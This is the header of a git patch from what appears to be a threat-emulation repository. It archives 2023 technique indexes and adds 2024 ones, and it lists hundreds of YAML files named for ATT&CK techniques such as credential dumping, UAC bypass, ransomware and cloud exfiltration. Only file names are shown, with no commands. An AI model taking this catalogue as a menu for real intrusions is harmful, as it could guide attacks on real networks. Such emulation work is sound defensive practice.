From b6a14ab25efd1ff55d648111733f7030ec811d0b Mon Sep 17 00:00:00 2001
From: 2XXE-SRA <40869774+2XXE-SRA@users.noreply.github.com>
Date: Wed, 3 Jan 2024 13:33:08 -0800
Subject: [PATCH] 2024 indexes

---
 README.md                                     |   70 +-
 archived/2023/README.md                       |   84 +
 .../2023/fs-index-2023}/CHANGELOG.md          |    0
 .../2023/fs-index-2023}/NOTEBOOK.md           |    0
 .../2023/fs-index-2023}/REQUIREMENTS.md       |    0
 .../fs-index-2023-v1.2-summary.csv            |    0
 .../fs-index-2023}/fs-index-2023-v1.2.yml     |    0
 .../2023/fs-index-2023}/navigator.json        |    0
 .../Collection/T1560.001_7zip_v1.yml          |    0
 .../CommandandControl/T1071.001_httpc2_v3.yml |    0
 .../T1071.001_httpsc2_v3.yml                  |    0
 .../T1071.004_dnstxtc2_v3.yml                 |    0
 .../T1102.002_webservicec2_v3.yml             |    0
 .../CommandandControl/T1105_certutil_v2.yml   |    0
 .../T1105_tooldownload_v2.yml                 |    0
 .../T1219_remote_assist_v1.yml                |    0
 .../T1572_personalvpn_v1.yml                  |    0
 .../CredentialAccess/T1003.001_comsvcs_v1.yml |    0
 .../T1003.001_procdump_v2.yml                 |    0
 .../CredentialAccess/T1003.001_taskmgr_v1.yml |    0
 .../T1003.002_reg_save_all_v1.yml             |    0
 .../T1003.003_ntds_vssadmin_v1.yml            |    0
 .../T1003.003_ntdsutil_v2.yml                 |    0
 .../CredentialAccess/T1003.006_dcsync_v2.yml  |    0
 .../T1555.003_creddumpbrowser_v2.yml          |    0
 .../T1070.001_cleareventlog_v2.yml            |    0
 .../DefenseEvasion/T1218.005_mshta_v2.yml     |    0
 .../DefenseEvasion/T1218.008_odbcconf_v2.yml  |    0
 .../DefenseEvasion/T1218.010_regsvr32_v3.yml  |    0
 .../DefenseEvasion/T1218.011_proxy_exe_v1.yml |    0
 .../DefenseEvasion/T1218.011_rundll32_v1.yml  |    0
 .../DefenseEvasion/T1489_netstop_bulk_v2.yml  |    0
 .../DefenseEvasion/T1548.002_uacbypass_v3.yml |    0
 .../T1550.003_passtheticket_v2.yml            |    0
 .../T1574.001_dll_searchorderhijack_v1.yml    |    0
 .../Discovery/T1018_nltest_dclist_v1.yml      |    0
 .../Discovery/T1046_networkscan_v1.yml        |    0
 .../Discovery/T1087.002_adfind_bulk_v1.yml    |    0
 .../Discovery/T1087.002_ldap_users_v1.yml     |    0
 .../T1087.002_net_domainadmins_v1.yml         |    0
 .../T1087.002_net_user_groups_v1.yml          |    0
 .../Discovery/T1135_netview_shares_v1.yml     |    0
 .../Discovery/T1482_nltest_all_v1.yml         |    0
 .../techniques/Execution/T1106_exe_v1.yml     |    0
 .../Execution/T1204.002_macro_hta_v1.yml      |    0
 .../Execution/T1204.002_macro_v1.yml          |    0
 .../Exfiltration/T1048.003_httpexfil_v2.yml   |    0
 .../Exfiltration/T1567.002_mega_rclone_v1.yml |    0
 .../Impact/T1021.002_remote_ransomware_v2.yml |    0
 .../techniques/Impact/T1486_ransomware_v3.yml |    0
 .../T1027.006_html_smuggle_email_v1.yml       |    0
 .../T1078_simultaneouslogin_v1.yml            |    0
 .../T1078_suspicious_login_v3.yml             |    0
 .../T1110.003_externalspray_v2.yml            |    0
 .../InitialAccess/T1566.001_zipped_iso_v1.yml |    0
 .../T1566.001_zipped_macro_v1.yml             |    0
 .../InitialAccess/T1566.002_spl_iso_v1.yml    |    0
 .../InitialAccess/T1621_mfa_spam_v1.yml       |    0
 .../LateralMovement/T1021.001_rdp_v2.yml      |    0
 .../LateralMovement/T1021.002_smbc2_v1.yml    |    0
 .../T1021.003_scheduledtask_v2.yml            |    0
 .../LateralMovement/T1021.003_wmipcc_v1.yml   |    0
 .../T1057_processdiscovery_remote_v1.yml      |    0
 .../LateralMovement/T1570_execopy_v1.yml      |    0
 .../Persistence/T1053.005_schtask_v7.yml      |    0
 .../T1136.001_newlocaladmin_v1.yml            |    0
 .../T1543.003_newservice_reg_v1.yml           |    0
 .../Persistence/T1547.001_runkey_v3.yml       |    0
 .../2023/h-index-2023}/NOTEBOOK.md            |    0
 .../2023/h-index-2023}/REQUIREMENTS.md        |    0
 .../h-index-2023-v1.2-summary.csv             |    0
 .../2023/h-index-2023}/h-index-2023-v1.2.yml  |    0
 .../2023/h-index-2023}/navigator.json         |    0
 .../Collection/T1056.001_keylog_v2.yml        |    0
 .../Collection/T1560.001_7zip_v1.yml          |    0
 .../CommandandControl/T1071.001_httpc2_v3.yml |    0
 .../T1071.001_httpsc2_v3.yml                  |    0
 .../T1071.004_dnstxtc2_v3.yml                 |    0
 .../T1105_tooldownload_v2.yml                 |    0
 .../T1219_remote_assist_v1.yml                |    0
 .../T1003.001_creddumpmemory_v3.yml           |    0
 .../T1003.001_procdump_v2.yml                 |    0
 .../T1003.001_processhacker_v1.yml            |    0
 .../T1003.002_hashdump_v1.yml                 |    0
 .../T1003.002_reg_save_all_v1.yml             |    0
 .../T1003.003_ntds_vssadmin_v1.yml            |    0
 .../T1555.003_creddumpbrowser_v2.yml          |    0
 .../T1140_certutil_decode_v2.yml              |    0
 .../DefenseEvasion/T1218.005_mshta_v2.yml     |    0
 .../DefenseEvasion/T1218.008_odbcconf_v2.yml  |    0
 .../DefenseEvasion/T1218.010_regsvr32_v3.yml  |    0
 .../DefenseEvasion/T1218.011_rundll32_v1.yml  |    0
 .../DefenseEvasion/T1548.002_uacbypass_v3.yml |    0
 .../Discovery/T1046_networkscan_v1.yml        |    0
 .../Discovery/T1057_processdiscovery_v1.yml   |    0
 .../Discovery/T1087.001_net_localgroup_v1.yml |    0
 .../Discovery/T1087.002_adfind_bulk_v1.yml    |    0
 .../T1087.002_net_domainadmins_v1.yml         |    0
 .../T1087.002_setspn_collection_v1.yml        |    0
 .../Discovery/T1135_netview_shares_v1.yml     |    0
 .../Discovery/T1482_nltest_all_v1.yml         |    0
 .../T1518.001_securitydiscovery_v3.yml        |    0
 .../techniques/Execution/T1106_exe_v1.yml     |    0
 .../Execution/T1204.002_macro_hta_v1.yml      |    0
 .../Execution/T1204.002_macro_v1.yml          |    0
 .../Exfiltration/T1041_httpc2exfil_v2.yml     |    0
 .../Exfiltration/T1567.002_mega_rclone_v1.yml |    0
 .../Impact/T1021.002_remote_ransomware_v2.yml |    0
 .../techniques/Impact/T1486_ransomware_v3.yml |    0
 .../T1027.006_html_smuggle_email_v1.yml       |    0
 .../T1566.001_encarchive_macro_v1.yml         |    0
 .../InitialAccess/T1566.001_zipped_iso_v1.yml |    0
 .../InitialAccess/T1566.001_zipped_js_v1.yml  |    0
 .../InitialAccess/T1566.002_zipped_iso_v1.yml |    0
 .../InitialAccess/T1621_mfa_spam_v1.yml       |    0
 .../LateralMovement/T1021.001_rdp_v2.yml      |    0
 .../LateralMovement/T1021.003_wmipcc_v1.yml   |    0
 .../Persistence/T1053.005_schtask_v7.yml      |    0
 .../T1136.001_newlocaladmin_v1.yml            |    0
 .../T1543.003_newservice_reg_v1.yml           |    0
 .../Persistence/T1547.001_runonce_v2.yml      |    0
 .../T1547.001_startupfolder_v1.yml            |    0
 .../T1564.002_hide_user_logon_v1.yml          |    0
 .../2023/rh-index-2023}/NOTEBOOK.md           |    0
 .../2023/rh-index-2023}/REQUIREMENTS.md       |    0
 .../2023/rh-index-2023}/navigator.json        |    0
 .../rh-index-2023-v1.2-summary.csv            |    0
 .../rh-index-2023}/rh-index-2023-v1.2.yml     |    0
 .../Collection/T1560.001_7zip_v1.yml          |    0
 .../CommandandControl/T1071.001_httpc2_v3.yml |    0
 .../T1071.001_httpsc2_v3.yml                  |    0
 .../T1071.004_dnstxtc2_v3.yml                 |    0
 .../T1105_tooldownload_v2.yml                 |    0
 .../T1219_remote_assist_v1.yml                |    0
 .../T1003.001_procdump_v2.yml                 |    0
 .../T1003.001_processhacker_v1.yml            |    0
 .../T1003.002_hashdump_v1.yml                 |    0
 .../T1003.003_ntds_vssadmin_v1.yml            |    0
 .../T1003.003_ntdsutil_v2.yml                 |    0
 .../CredentialAccess/T1003.006_dcsync_v2.yml  |    0
 .../T1555.003_creddumpbrowser_v2.yml          |    0
 .../T1558.003_kerberoast_v3.yml               |    0
 .../DefenseEvasion/T1218.005_mshta_v2.yml     |    0
 .../DefenseEvasion/T1218.008_odbcconf_v2.yml  |    0
 .../DefenseEvasion/T1218.010_regsvr32_v3.yml  |    0
 .../DefenseEvasion/T1218.011_rundll32_v1.yml  |    0
 .../DefenseEvasion/T1548.002_uacbypass_v3.yml |    0
 .../Discovery/T1018_nltest_dclist_v1.yml      |    0
 .../Discovery/T1046_networkscan_v1.yml        |    0
 .../Discovery/T1049_sessiongopher_v1.yml      |    0
 .../Discovery/T1082_systeminfo_v1.yml         |    0
 .../Discovery/T1087.001_net_localgroup_v1.yml |    0
 .../Discovery/T1087.002_ad_explorer_v1.yml    |    0
 .../T1087.002_net_domainadmins_v1.yml         |    0
 .../T1087.002_setspn_collection_v1.yml        |    0
 .../Discovery/T1135_netview_shares_v1.yml     |    0
 .../Discovery/T1482_nltest_all_v1.yml         |    0
 .../techniques/Execution/T1059.005_vbs_v1.yml |    0
 .../techniques/Execution/T1106_exe_v1.yml     |    0
 .../Execution/T1204.002_macro_hta_v1.yml      |    0
 .../Execution/T1204.002_macro_v1.yml          |    0
 .../Exfiltration/T1567.002_mega_rclone_v1.yml |    0
 .../Impact/T1021.002_remote_ransomware_v2.yml |    0
 .../techniques/Impact/T1486_ransomware_v3.yml |    0
 .../T1027.006_html_smuggle_email_v1.yml       |    0
 .../T1078_simultaneouslogin_v1.yml            |    0
 .../T1078_suspicious_login_v3.yml             |    0
 .../InitialAccess/T1566.001_zipped_iso_v1.yml |    0
 .../T1566.001_zipped_macro_v1.yml             |    0
 .../InitialAccess/T1566.002_zipped_iso_v1.yml |    0
 .../InitialAccess/T1566.002_zipped_vbs_v1.yml |    0
 .../InitialAccess/T1621_mfa_spam_v1.yml       |    0
 .../LateralMovement/T1021.001_rdp_v2.yml      |    0
 .../LateralMovement/T1021.003_wmipcc_v1.yml   |    0
 .../Persistence/T1053.005_schtask_v7.yml      |    0
 .../Persistence/T1098.005_aadjoin_v1.yml      |    0
 .../T1136.001_newlocaladmin_v1.yml            |    0
 .../T1543.003_newservice_reg_v1.yml           |    0
 fs-index-2024/CHANGELOG.md                    |    4 +
 fs-index-2024/REQUIREMENTS.md                 |   39 +
 fs-index-2024/fs-index-2024-v1.0-layer.json   | 3152 ++++++++++++++++
 fs-index-2024/fs-index-2024-v1.0-notebook.md  |  500 +++
 fs-index-2024/fs-index-2024-v1.0-summary.csv  |   51 +
 fs-index-2024/fs-index-2024-v1.0.yml          | 1022 ++++++
 .../804512cc-4acf-4be3-a577-ce02ea723fab.yml  |   19 +
 .../be524cb1-12e6-4708-ad57-faf91dfad9de.yml  |   20 +
 .../10f6c44e-b862-4553-bc55-68f6d941bcfb.yml  |   20 +
 .../38064494-0d58-4f48-bce8-b5b7ea7db3da.yml  |   18 +
 .../3ed2f449-744b-48c3-80d2-854386e446a0.yml  |   18 +
 .../43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml  |   21 +
 .../9755cd8b-5212-4331-8c6e-afb27404a4b9.yml  |   18 +
 .../314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml  |   21 +
 .../6efcb4c5-d740-41ce-a0dc-b63734813928.yml  |   22 +
 .../79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml  |   25 +
 .../8eeb3c12-dc2e-4791-aff5-e81501312886.yml  |   20 +
 .../95790889-fb7d-42af-a221-3535e4197cde.yml  |   22 +
 .../9a66066b-997b-4ff1-8b4b-c14d982df861.yml  |   19 +
 .../c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml  |   20 +
 .../d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml  |   20 +
 .../16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml  |   22 +
 .../2496e250-5757-482f-9661-daea872395ae.yml  |   20 +
 .../327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml  |   22 +
 .../8c06191e-8c03-4b97-8c18-e28cde39fda5.yml  |   25 +
 .../940be4b6-6081-4808-ab64-aceadfeb3792.yml  |   20 +
 .../cb3ea139-979c-438a-9cf7-611b985f4d61.yml  |   20 +
 .../cbd9070f-03fa-455f-af46-99e8d41146ac.yml  |   16 +
 .../3f120c23-78c0-462f-808f-38ef4f607233.yml  |   24 +
 .../4266c26e-0470-4b97-8dc3-1d24fe35f586.yml  |   20 +
 .../672f8861-c914-4f58-b861-5107ce19f61c.yml  |   22 +
 .../7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml  |   23 +
 .../9064e91a-be78-48a5-9112-28d5701d6d51.yml  |   19 +
 .../bc85f11b-e481-4afb-a5f5-db26e5c07433.yml  |   20 +
 .../a7134d71-dc49-41a8-a309-ec520c96a089.yml  |   22 +
 .../7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml  |   19 +
 .../9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml  |   19 +
 .../b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml  |   20 +
 .../31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml  |   20 +
 .../45591791-541b-4a27-bda9-75e6d78a66f4.yml  |   16 +
 .../72224b97-93d1-4087-8b82-6b4342bf2e09.yml  |   20 +
 .../1f9d5363-ddf4-41c3-8bc3-f80595219206.yml  |   16 +
 .../44fd7250-e613-441f-9cb6-5b98c2d71338.yml  |   20 +
 .../609515fe-24e0-4bc2-a069-a3d815e68ec2.yml  |   17 +
 .../97f1da56-79a3-4181-a491-8de9f93b05af.yml  |   17 +
 .../ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml  |   16 +
 .../ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml  |   17 +
 .../0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml  |   20 +
 .../3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml  |   23 +
 .../9b5396f2-6e4a-498a-995e-47e48a99bf76.yml  |   24 +
 .../b74ff4c5-eebf-466b-af85-341b19c4c748.yml  |   20 +
 .../05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml  |   23 +
 .../20a6dace-d801-42f5-b659-6cf91e39d273.yml  |   20 +
 .../5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml  |   20 +
 .../ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml  |   20 +
 .../b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml  |   23 +
 h-index-2024/CHANGELOG.md                     |    4 +
 h-index-2024/REQUIREMENTS.md                  |   38 +
 h-index-2024/h-index-2024-v1.0-layer.json     | 3168 ++++++++++++++++
 h-index-2024/h-index-2024-v1.0-notebook.md    |  525 +++
 h-index-2024/h-index-2024-v1.0-summary.csv    |   52 +
 h-index-2024/h-index-2024-v1.0.yml            | 1040 ++++++
 .../804512cc-4acf-4be3-a577-ce02ea723fab.yml  |   19 +
 .../be524cb1-12e6-4708-ad57-faf91dfad9de.yml  |   20 +
 .../10f6c44e-b862-4553-bc55-68f6d941bcfb.yml  |   20 +
 .../38064494-0d58-4f48-bce8-b5b7ea7db3da.yml  |   18 +
 .../3ed2f449-744b-48c3-80d2-854386e446a0.yml  |   18 +
 .../9755cd8b-5212-4331-8c6e-afb27404a4b9.yml  |   18 +
 .../314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml  |   21 +
 .../6efcb4c5-d740-41ce-a0dc-b63734813928.yml  |   22 +
 .../79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml  |   25 +
 .../8eeb3c12-dc2e-4791-aff5-e81501312886.yml  |   20 +
 .../95790889-fb7d-42af-a221-3535e4197cde.yml  |   22 +
 .../9a66066b-997b-4ff1-8b4b-c14d982df861.yml  |   19 +
 .../c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml  |   20 +
 .../d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml  |   20 +
 .../16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml  |   22 +
 .../2496e250-5757-482f-9661-daea872395ae.yml  |   20 +
 .../327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml  |   22 +
 .../8c06191e-8c03-4b97-8c18-e28cde39fda5.yml  |   25 +
 .../940be4b6-6081-4808-ab64-aceadfeb3792.yml  |   20 +
 .../cb3ea139-979c-438a-9cf7-611b985f4d61.yml  |   20 +
 .../cbd9070f-03fa-455f-af46-99e8d41146ac.yml  |   16 +
 .../3f120c23-78c0-462f-808f-38ef4f607233.yml  |   24 +
 .../4266c26e-0470-4b97-8dc3-1d24fe35f586.yml  |   20 +
 .../672f8861-c914-4f58-b861-5107ce19f61c.yml  |   22 +
 .../7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml  |   23 +
 .../bc85f11b-e481-4afb-a5f5-db26e5c07433.yml  |   20 +
 .../a7134d71-dc49-41a8-a309-ec520c96a089.yml  |   22 +
 .../11b7a86e-4596-4df9-a2a9-705096756d28.yml  |   20 +
 .../7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml  |   19 +
 .../9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml  |   19 +
 .../b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml  |   20 +
 .../31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml  |   20 +
 .../45591791-541b-4a27-bda9-75e6d78a66f4.yml  |   16 +
 .../72224b97-93d1-4087-8b82-6b4342bf2e09.yml  |   20 +
 .../0a348365-1f35-445c-baf0-a6687ddc3f40.yml  |   17 +
 .../1f9d5363-ddf4-41c3-8bc3-f80595219206.yml  |   16 +
 .../609515fe-24e0-4bc2-a069-a3d815e68ec2.yml  |   17 +
 .../98551e7e-1cb8-47c0-a27d-772ddd700617.yml  |   17 +
 .../ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml  |   16 +
 .../ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml  |   17 +
 .../0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml  |   20 +
 .../3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml  |   23 +
 .../9b5396f2-6e4a-498a-995e-47e48a99bf76.yml  |   24 +
 .../b74ff4c5-eebf-466b-af85-341b19c4c748.yml  |   20 +
 .../05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml  |   23 +
 .../0bcb2080-b140-4a1c-9e79-8512a18882d8.yml  |   21 +
 .../20a6dace-d801-42f5-b659-6cf91e39d273.yml  |   20 +
 .../5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml  |   20 +
 .../5dc3f424-8f31-49ee-a822-a77ce20bac43.yml  |   20 +
 .../ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml  |   20 +
 .../b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml  |   23 +
 indexes.json                                  |    7 +-
 ot-index-2024/CHANGELOG.md                    |    4 +
 ot-index-2024/REQUIREMENTS.md                 |   36 +
 ot-index-2024/ot-index-2024-v1.0-layer.json   | 3184 +++++++++++++++++
 ot-index-2024/ot-index-2024-v1.0-notebook.md  |  534 +++
 ot-index-2024/ot-index-2024-v1.0-summary.csv  |   55 +
 ot-index-2024/ot-index-2024-v1.0.yml          | 1096 ++++++
 .../804512cc-4acf-4be3-a577-ce02ea723fab.yml  |   19 +
 .../be524cb1-12e6-4708-ad57-faf91dfad9de.yml  |   20 +
 .../10f6c44e-b862-4553-bc55-68f6d941bcfb.yml  |   20 +
 .../38064494-0d58-4f48-bce8-b5b7ea7db3da.yml  |   18 +
 .../3ed2f449-744b-48c3-80d2-854386e446a0.yml  |   18 +
 .../9755cd8b-5212-4331-8c6e-afb27404a4b9.yml  |   18 +
 .../08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml  |   22 +
 .../314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml  |   21 +
 .../6efcb4c5-d740-41ce-a0dc-b63734813928.yml  |   22 +
 .../79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml  |   25 +
 .../8eeb3c12-dc2e-4791-aff5-e81501312886.yml  |   20 +
 .../95790889-fb7d-42af-a221-3535e4197cde.yml  |   22 +
 .../9a66066b-997b-4ff1-8b4b-c14d982df861.yml  |   19 +
 .../c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml  |   20 +
 .../d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml  |   20 +
 .../16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml  |   22 +
 .../2496e250-5757-482f-9661-daea872395ae.yml  |   20 +
 .../327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml  |   22 +
 .../8c06191e-8c03-4b97-8c18-e28cde39fda5.yml  |   25 +
 .../940be4b6-6081-4808-ab64-aceadfeb3792.yml  |   20 +
 .../cb3ea139-979c-438a-9cf7-611b985f4d61.yml  |   20 +
 .../cbd9070f-03fa-455f-af46-99e8d41146ac.yml  |   16 +
 .../672f8861-c914-4f58-b861-5107ce19f61c.yml  |   22 +
 .../7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml  |   23 +
 .../bc85f11b-e481-4afb-a5f5-db26e5c07433.yml  |   20 +
 .../a7134d71-dc49-41a8-a309-ec520c96a089.yml  |   22 +
 .../7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml  |   19 +
 .../9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml  |   19 +
 .../b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml  |   20 +
 .../31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml  |   20 +
 .../45591791-541b-4a27-bda9-75e6d78a66f4.yml  |   16 +
 .../72224b97-93d1-4087-8b82-6b4342bf2e09.yml  |   20 +
 .../99c34e6d-c82a-48b8-88ea-7453f98ee561.yml  |   20 +
 .../0a348365-1f35-445c-baf0-a6687ddc3f40.yml  |   17 +
 .../98551e7e-1cb8-47c0-a27d-772ddd700617.yml  |   17 +
 .../ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml  |   16 +
 .../ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml  |   17 +
 .../0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml  |   20 +
 .../3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml  |   23 +
 .../9b5396f2-6e4a-498a-995e-47e48a99bf76.yml  |   24 +
 .../0abf446d-3422-4b78-a029-a3485be7be2f.yml  |   18 +
 .../3ac5c6b7-aa22-4359-9506-c675391c8b63.yml  |   20 +
 .../594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml  |   18 +
 .../6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml  |   20 +
 .../85c528ae-0337-45c8-a413-41d59a67b924.yml  |   18 +
 .../9b542d39-29c9-4659-9756-6813426ff41b.yml  |   17 +
 .../b7cefb21-5835-478e-8541-b09d15c11948.yml  |   20 +
 .../db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml  |   20 +
 .../05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml  |   23 +
 .../20a6dace-d801-42f5-b659-6cf91e39d273.yml  |   20 +
 .../5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml  |   20 +
 .../5dc3f424-8f31-49ee-a822-a77ce20bac43.yml  |   20 +
 .../ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml  |   20 +
 .../b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml  |   23 +
 rh-index-2024/CHANGELOG.md                    |    4 +
 rh-index-2024/REQUIREMENTS.md                 |   37 +
 rh-index-2024/rh-index-2024-v1.0-layer.json   | 3156 ++++++++++++++++
 rh-index-2024/rh-index-2024-v1.0-notebook.md  |  425 +++
 rh-index-2024/rh-index-2024-v1.0-summary.csv  |   51 +
 rh-index-2024/rh-index-2024-v1.0.yml          | 1020 ++++++
 .../804512cc-4acf-4be3-a577-ce02ea723fab.yml  |   19 +
 .../be524cb1-12e6-4708-ad57-faf91dfad9de.yml  |   20 +
 .../10f6c44e-b862-4553-bc55-68f6d941bcfb.yml  |   20 +
 .../38064494-0d58-4f48-bce8-b5b7ea7db3da.yml  |   18 +
 .../3ed2f449-744b-48c3-80d2-854386e446a0.yml  |   18 +
 .../9755cd8b-5212-4331-8c6e-afb27404a4b9.yml  |   18 +
 .../314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml  |   21 +
 .../79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml  |   25 +
 .../8eeb3c12-dc2e-4791-aff5-e81501312886.yml  |   20 +
 .../95790889-fb7d-42af-a221-3535e4197cde.yml  |   22 +
 .../9a66066b-997b-4ff1-8b4b-c14d982df861.yml  |   19 +
 .../c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml  |   20 +
 .../d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml  |   20 +
 .../16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml  |   22 +
 .../2496e250-5757-482f-9661-daea872395ae.yml  |   20 +
 .../327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml  |   22 +
 .../8c06191e-8c03-4b97-8c18-e28cde39fda5.yml  |   25 +
 .../940be4b6-6081-4808-ab64-aceadfeb3792.yml  |   20 +
 .../9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml  |   20 +
 .../cb3ea139-979c-438a-9cf7-611b985f4d61.yml  |   20 +
 .../cbd9070f-03fa-455f-af46-99e8d41146ac.yml  |   16 +
 .../3f120c23-78c0-462f-808f-38ef4f607233.yml  |   24 +
 .../4266c26e-0470-4b97-8dc3-1d24fe35f586.yml  |   20 +
 .../672f8861-c914-4f58-b861-5107ce19f61c.yml  |   22 +
 .../7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml  |   23 +
 .../9064e91a-be78-48a5-9112-28d5701d6d51.yml  |   19 +
 .../bc85f11b-e481-4afb-a5f5-db26e5c07433.yml  |   20 +
 .../a7134d71-dc49-41a8-a309-ec520c96a089.yml  |   22 +
 .../11b7a86e-4596-4df9-a2a9-705096756d28.yml  |   20 +
 .../7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml  |   19 +
 .../9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml  |   19 +
 .../b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml  |   20 +
 .../31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml  |   20 +
 .../45591791-541b-4a27-bda9-75e6d78a66f4.yml  |   16 +
 .../72224b97-93d1-4087-8b82-6b4342bf2e09.yml  |   20 +
 .../1f9d5363-ddf4-41c3-8bc3-f80595219206.yml  |   16 +
 .../609515fe-24e0-4bc2-a069-a3d815e68ec2.yml  |   17 +
 .../97f1da56-79a3-4181-a491-8de9f93b05af.yml  |   17 +
 .../ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml  |   16 +
 .../ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml  |   17 +
 .../0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml  |   20 +
 .../3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml  |   23 +
 .../9b5396f2-6e4a-498a-995e-47e48a99bf76.yml  |   24 +
 .../b74ff4c5-eebf-466b-af85-341b19c4c748.yml  |   20 +
 .../05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml  |   23 +
 .../0bcb2080-b140-4a1c-9e79-8512a18882d8.yml  |   21 +
 .../20a6dace-d801-42f5-b659-6cf91e39d273.yml  |   20 +
 .../5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml  |   20 +
 .../ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml  |   20 +
 .../b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml  |   23 +
 408 files changed, 23447 insertions(+), 32 deletions(-)
 create mode 100644 archived/2023/README.md
 rename {fs-index-2023 => archived/2023/fs-index-2023}/CHANGELOG.md (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/NOTEBOOK.md (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/REQUIREMENTS.md (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/fs-index-2023-v1.2-summary.csv (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/fs-index-2023-v1.2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/navigator.json (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Collection/T1560.001_7zip_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1071.001_httpc2_v3.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1071.001_httpsc2_v3.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1102.002_webservicec2_v3.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1105_certutil_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1105_tooldownload_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1219_remote_assist_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1572_personalvpn_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.001_procdump_v2.yml (100%)
